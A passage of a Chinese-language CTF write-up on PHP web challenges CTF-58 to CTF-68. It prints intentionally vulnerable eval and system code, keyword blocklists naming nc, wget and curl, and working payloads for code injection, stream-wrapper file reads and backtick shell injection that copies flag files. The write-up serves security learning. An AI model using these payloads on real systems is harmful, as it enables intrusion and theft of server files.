class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/\~|\`|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/'</span><span class="pun">,</span><span class="pln"> $v1</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"error v1"</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/\~|\`|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/'</span><span class="pun">,</span><span class="pln"> $v2</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"error v2"</span><span class="pun">);</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    </span><span class="kwd">eval</span><span class="pun">(</span><span class="str">"echo new $v1($v2());"</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="pun">}</span></code></li><li class="L4"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>利用FilesystemIterator获取目录文件FilesystemIterator</strong></p>
<p>getcwd函数取得当前工作目录getcwd函数</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">playload</span><span class="pun">：</span><span class="pln">v1</span><span class="pun">=</span><span class="typ">FilesystemIterator</span><span class="pun">&amp;</span><span class="pln">v2</span><span class="pun">=</span><span class="pln">getcwd</span></code></li></ol></pre><p><strong>得到当前目录的第一个FLAG文件名字，然后访问该文件即可。<br>缺陷：只能获取第一个文件名字</strong></p>
<h2 id="h2-ctf-59"><a name="CTF-59" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-59</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'file'</span><span class="pun">])){</span></code></li><li class="L2"><code class="lang-php"><span class="pln">        $file</span><span class="pun">=</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'file'</span><span class="pun">];</span></code></li><li class="L3"><code class="lang-php"><span class="pln">        $content </span><span class="pun">=</span><span class="pln"> file_get_contents</span><span class="pun">(</span><span class="pln">$file</span><span class="pun">);</span></code></li><li class="L4"><code class="lang-php"><span class="pln">        </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/flag/'</span><span class="pun">,</span><span class="pln">$content</span><span class="pun">)){</span></code></li><li class="L5"><code class="lang-php"><span class="pln">            echo </span><span class="str">"hacker!"</span><span class="pun">;</span></code></li><li class="L6"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">            echo $content</span><span class="pun">;</span></code></li><li class="L8"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">        highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p>因为过滤了flag字符<br>所以普通伪协议读不出来<br>所以先进行一次base64编码再读出来</p>
<h2 id="h2-ctf-60"><a name="CTF-60" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-60</h2><p><strong>源码解析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">error_reporting</span><span class="pun">(</span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="kwd">function</span><span class="pln"> filter</span><span class="pun">(</span><span class="pln">$file</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/filter|\.\.\/|http|https|data|data|rot13|base64|string/i'</span><span class="pun">,</span><span class="pln"> $file</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L5"><code class="lang-php"><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">'hacker!'</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">        </span><span class="kwd">return</span><span class="pln"> $file</span><span class="pun">;</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="pln">$file </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'file'</span><span class="pun">];</span></code></li><li class="L1"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(!</span><span class="pln">is_file</span><span class="pun">(</span><span class="pln">$file</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    highlight_file</span><span class="pun">(</span><span class="pln">filter</span><span class="pun">(</span><span class="pln">$file</span><span class="pun">));</span></code></li><li class="L3"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    echo </span><span class="str">"hacker!"</span><span class="pun">;</span></code></li><li class="L5"><code class="lang-php"><span class="pun">}</span></code></li><li class="L6"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p>因为过滤了filter只能换一种读取方式了<br>利用读取压缩流</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">：?</span><span class="pln">file</span><span class="pun">=</span><span class="pln">compress</span><span class="pun">.</span><span class="pln">zlib</span><span class="pun">:</span><span class="com">//flag.php</span></code></li></ol></pre><h2 id="h2-ctf-61"><a name="CTF-61" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-61</h2><p><strong>源码解析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">error_reporting</span><span class="pun">(</span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="pln">include </span><span class="pun">(</span><span class="str">"flag.php"</span><span class="pun">);</span></code></li><li class="L4"><code class="lang-php"><span class="pln">$a </span><span class="pun">=</span><span class="pln"> $_SERVER</span><span class="pun">[</span><span class="str">'argv'</span><span class="pun">];</span></code></li><li class="L5"><code class="lang-php"><span class="pln">$c </span><span class="pun">=</span><span class="pln"> $_POST</span><span class="pun">[</span><span class="str">'fun'</span><span class="pun">];</span></code></li><li class="L6"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'CTF_SHOW'</span><span class="pun">])</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> isset</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'CTF_SHOW.COM'</span><span class="pun">])</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> </span><span class="pun">!</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'fl0g'</span><span class="pun">]))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/"</span><span class="pun">,</span><span class="pln"> $c</span><span class="pun">)</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> $c </span><span class="pun">&lt;=</span><span class="pln"> </span><span class="lit">18</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L8"><code class="lang-php"><span class="pln">        </span><span class="kwd">eval</span><span class="pun">(</span><span class="str">"$c"</span><span class="pln"> </span><span class="pun">.</span><span class="pln"> </span><span class="str">";"</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pln">        </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$fl0g </span><span class="pun">===</span><span class="pln"> </span><span class="str">"flag_give_me"</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">            echo $flag</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L3"><code class="lang-php"><span class="pun">}</span></code></li><li class="L4"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>此处的php特性：</strong>在php中变量名字是由数字字母和下划线组成的，所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线，但是用一个特性是可以绕过的，就是当[提前出现后，后面的点就不会再被转义了<br>such as：CTF[SHOW.COM=&gt;CTF_SHOW.COM</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">：</span><span class="pln">CTF_SHOW</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">CTF</span><span class="pun">[</span><span class="pln">SHOW</span><span class="pun">.</span><span class="pln">COM</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">fun</span><span class="pun">=</span><span class="pln">echo $flag</span></code></li></ol></pre><h2 id="h2-ctf-62"><a name="CTF-62" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-62</h2><p><strong>源码解析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">error_reporting</span><span class="pun">(</span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="pln">include </span><span class="pun">(</span><span class="str">"flag.php"</span><span class="pun">);</span></code></li><li class="L4"><code class="lang-php"><span class="pln">$a </span><span class="pun">=</span><span class="pln"> $_SERVER</span><span class="pun">[</span><span class="str">'argv'</span><span class="pun">];</span></code></li><li class="L5"><code class="lang-php"><span class="pln">$c </span><span class="pun">=</span><span class="pln"> $_POST</span><span class="pun">[</span><span class="str">'fun'</span><span class="pun">];</span></code></li><li class="L6"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'CTF_SHOW'</span><span class="pun">])</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> isset</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'CTF_SHOW.COM'</span><span class="pun">])</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> </span><span class="pun">!</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'fl0g'</span><span class="pun">]))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print/i"</span><span class="pun">,</span><span class="pln"> $c</span><span class="pun">)</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> $c </span><span class="pun">&lt;=</span><span class="pln"> </span><span class="lit">16</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L8"><code class="lang-php"><span class="pln">        </span><span class="kwd">eval</span><span class="pun">(</span><span class="str">"$c"</span><span class="pln"> </span><span class="pun">.</span><span class="pln"> </span><span class="str">";"</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pln">        </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$fl0g </span><span class="pun">===</span><span class="pln"> </span><span class="str">"flag_give_me"</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">            echo $flag</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L3"><code class="lang-php"><span class="pun">}</span></code></li><li class="L4"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p>$argv：传递给脚本的参数数组</p>
<p><a href="https://www.cnblogs.com/mitang/p/3874291.html" title="详解 $_SERVER 函数中QUERY_STRING和REQUEST_URI区别">详解 $_SERVER 函数中QUERY_STRING和REQUEST_URI区别</a></p>
<p>$_SERVER[‘argv’]：</p>
<p>1、cli模式（命令行）下</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">第一个参数</span><span class="pln">$_SERVER</span><span class="pun">[</span><span class="str">'argv'</span><span class="pun">][</span><span class="lit">0</span><span class="pun">]是脚本名，其余的是传递给脚本的参数</span></code></li></ol></pre><p>2、web网页模式下</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">在</span><span class="pln">web</span><span class="pun">页模式下必须在</span><span class="pln">php</span><span class="pun">.</span><span class="pln">ini</span><span class="pun">开启</span><span class="pln">register_argc_argv</span><span class="pun">配置项</span></code></li><li class="L1"><code></code></li><li class="L2"><code><span class="pun">设置</span><span class="pln">register_argc_argv </span><span class="pun">=</span><span class="pln"> </span><span class="typ">On</span><span class="pun">(默认是</span><span class="typ">Off</span><span class="pun">)，重启服务，</span><span class="pln">$_SERVER</span><span class="pun">[‘</span><span class="pln">argv</span><span class="pun">’]才会有效果</span></code></li><li class="L3"><code></code></li><li class="L4"><code><span class="pun">这时候的</span><span class="pln">$_SERVER</span><span class="pun">[‘</span><span class="pln">argv</span><span class="pun">’][</span><span class="lit">0</span><span class="pun">]</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> $_SERVER</span><span class="pun">[‘</span><span class="pln">QUERY_STRING</span><span class="pun">’]</span></code></li><li class="L5"><code></code></li><li class="L6"><code><span class="pln">$argv</span><span class="pun">,</span><span class="pln">$argc</span><span class="pun">在</span><span class="pln">web</span><span class="pun">模式下不适用</span></code></li></ol></pre><p>我们是在网页模式下的，注意重点：<br>$_SERVER[‘argv’][0] = $_SERVER[‘QUERY_STRING’]<br>而 $_SERVER[‘QUERY_STRING’] 是获取查询语句，也就是?后面的语句</p>
<p>举个例子</p>
<p>?$fl0g=flag_give_me<br>$a[0]=$_SERVER[‘argv’][0]=$_SERVER[‘QUERY_STRING’]=&gt;$fl0g=flag_give_me</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pln">payload</span><span class="pun">：</span></code></li><li class="L1"><code class="lang-php"></code></li><li class="L2"><code class="lang-php"><span class="pln">POST</span><span class="pun">：</span><span class="pln">CTF_SHOW</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">CTF</span><span class="pun">[</span><span class="pln">SHOW</span><span class="pun">.</span><span class="pln">COM</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">fun</span><span class="pun">=</span><span class="kwd">eval</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">[</span><span class="lit">0</span><span class="pun">])</span></code></li><li class="L3"><code class="lang-php"><span class="pln">GET</span><span class="pun">：?</span><span class="pln">$fl0g</span><span class="pun">=</span><span class="pln">flag_give_me</span><span class="pun">;</span></code></li><li class="L4"><code class="lang-php"></code></li><li class="L5"><code class="lang-php"><span class="pln">POST</span><span class="pun">：</span><span class="pln">CTF_SHOW</span><span class="pun">=</span><span class="lit">6</span><span class="pun">&amp;</span><span class="pln">CTF</span><span class="pun">[</span><span class="pln">SHOW</span><span class="pun">.</span><span class="pln">COM</span><span class="pun">=</span><span class="lit">6</span><span class="pun">&amp;</span><span class="pln">fun</span><span class="pun">=</span><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="lit">1</span><span class="pun">])</span></code></li><li class="L6"><code class="lang-php"><span class="pln">GET</span><span class="pun">：?</span><span class="lit">1</span><span class="pun">=</span><span class="pln">flag</span><span class="pun">.</span><span class="pln">php</span></code></li></ol></pre>
<h2 id="h2-ctf-64"><a name="CTF-64" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-64</h2><p>将16进制转换成字符得到<br>一段c语言代码执行后可以得到文件路径<br>再传入参数路径读取flag文件</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">:</span></code></li><li class="L1"><code><span class="pun">?</span><span class="pln">f</span><span class="pun">=</span><span class="pln">flagx</span><span class="pun">/</span><span class="pln">flagx1</span><span class="pun">/</span><span class="pln">flagx2</span><span class="pun">/</span><span class="pln">flagx3</span><span class="pun">/</span><span class="pln">flag</span><span class="pun">.</span><span class="pln">php</span></code></li></ol></pre><h2 id="h2-ctf-65"><a name="CTF-65" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-65</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">error_reporting</span><span class="pun">(</span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">$F </span><span class="pun">=</span><span class="pln"> </span><span class="lit">@$_GET</span><span class="pun">[</span><span class="str">'F'</span><span class="pun">]){</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i'</span><span class="pun">,</span><span class="pln"> $F</span><span class="pun">)){</span></code></li><li class="L5"><code class="lang-php"><span class="pln">        </span><span class="kwd">eval</span><span class="pun">(</span><span class="pln">substr</span><span class="pun">(</span><span class="pln">$F</span><span class="pun">,</span><span class="lit">0</span><span class="pun">,</span><span class="lit">6</span><span class="pun">));</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"冲啊,flag就在flag.php里头，把它拿下！"</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>利用的是cp命令<br>把flag.php文件的内容拷贝到666.txt里面</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">:</span></code></li><li class="L1"><code><span class="pun">?</span><span class="pln">F</span><span class="pun">=</span><span class="str">`$F`</span><span class="pln"> </span><span class="pun">;</span><span class="pln">cp flag</span><span class="pun">.</span><span class="pln">php </span><span class="lit">666.txt</span></code></li><li class="L2"><code><span class="pun">?</span><span class="pln">F</span><span class="pun">=</span><span class="str">`$F`</span><span class="pln"> </span><span class="pun">;</span><span class="pln">nl flag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">&gt;</span><span class="lit">666.txt</span></code></li><li class="L3"><code><span class="pun">?</span><span class="pln">F</span><span class="pun">=</span><span class="str">`$F`</span><span class="pln"> </span><span class="pun">;</span><span class="pln">mv flag</span><span class="pun">.</span><span class="pln">php </span><span class="lit">666.txt</span></code></li></ol></pre><h2 id="h2-ctf-66"><a name="CTF-66" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-66</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">error_reporting</span><span class="pun">(</span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="kwd">class</span><span class="pln"> hello </span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">function</span><span class="pln"> __wakeup</span><span class="pun">(){</span></code></li><li class="L5"><code class="lang-php"><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"private class"</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="kwd">static</span><span class="pln"> </span><span class="kwd">function</span><span class="pln"> getFlag</span><span class="pun">(){</span></code></li><li class="L8"><code class="lang-php"><span class="pln">        echo file_get_contents</span><span class="pun">(</span><span class="str">"flag.php"</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="pun">}</span></code></li><li class="L1"><code class="lang-php"><span class="pln">call_user_func</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'hello'</span><span class="pun">]);</span></code></li></ol></pre>
<p><strong>调用类中函数，需要调用静态类</strong></p>
<p><strong>php中 -&gt;与:: 调用类中的成员的区别<br>-&gt;用于动态语境处理某个类的某个实例<br>::可以调用一个静态的、不依赖于其他初始化的类方法</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">PSOT</span><span class="pun">传入</span></code></li><li class="L1"><code><span class="pln">payload</span><span class="pun">：</span><span class="pln">hello</span><span class="pun">=</span><span class="pln">hello</span><span class="pun">::</span><span class="pln">getFlag</span></code></li></ol></pre><h2 id="h2-ctf-67"><a name="CTF-67" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-67</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">error_reporting</span><span class="pun">(</span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="kwd">class</span><span class="pln"> hello </span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">function</span><span class="pln"> __wakeup</span><span class="pun">(){</span></code></li><li class="L5"><code class="lang-php"><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"private class"</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="kwd">static</span><span class="pln"> </span><span class="kwd">function</span><span class="pln"> getFlag</span><span class="pun">(){</span></code></li><li class="L8"><code class="lang-php"><span class="pln">        echo file_get_contents</span><span class="pun">(</span><span class="str">"flag.php"</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="pun">}</span></code></li><li class="L1"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">strripos</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'hello'</span><span class="pun">],</span><span class="pln"> </span><span class="str">":"</span><span class="pun">)&gt;-</span><span class="lit">1</span><span class="pun">){</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"private function"</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="pun">}</span></code></li><li class="L4"><code class="lang-php"><span class="pln">call_user_func</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'hello'</span><span class="pun">]);</span></code></li></ol></pre>
<p><strong>php特性：考察了call_user_func用数组形式调用类方法</strong></p>
<p>详看：<a href="https://blog.csdn.net/weixin_42403771/article/details/115539786" title="根据方法名调用call_user_func详解">根据方法名调用call_user_func详解</a></p>
<p>php<br>call_user_func(array($classname, ‘say_hello’));<br>调用classname这个类里的sya_hello方法</p>
<p>array[0]=$classname  类名<br>array[1]=say_hello   say_hello()方法<br>call_user_func函数里面可以传数组，第一个元素是类名或者类的一个对象，第二个元素是类的方法名，同样可以调用。</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">：</span><span class="pln">hello</span><span class="pun">[</span><span class="lit">0</span><span class="pun">]=</span><span class="pln">hello</span><span class="pun">&amp;</span><span class="pln">hello</span><span class="pun">[</span><span class="lit">1</span><span class="pun">]=</span><span class="pln">getFlag</span></code></li></ol></pre><h2 id="h2-ctf-68"><a name="CTF-68" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-68</h2><p><strong>保存图片<br>用编辑打开可以看到里面的源码</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"></code></li><li class="L2"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'cmd'</span><span class="pun">]))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    $cmd </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'cmd'</span><span class="pun">];</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/flag/i'</span><span class="pun">,</span><span class="pln">$cmd</span><span class="pun">))</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="pun">{</span></code></li><li class="L6"><code class="lang-php"><span class="pln">        var_dump</span><span class="pun">(</span><span class="pln">system</span><span class="pun">(</span><span class="str">'cat '</span><span class="pln"> </span><span class="pun">.</span><span class="pln"> $cmd</span><span class="pun">));</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L9"><code class="lang-php"><span class="pln">    echo </span><span class="str">'hello!'</span><span class="pun">;</span></code></li><li class="L0"><code class="lang-php"><span class="pun">}</span></code></li><li class="L1"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
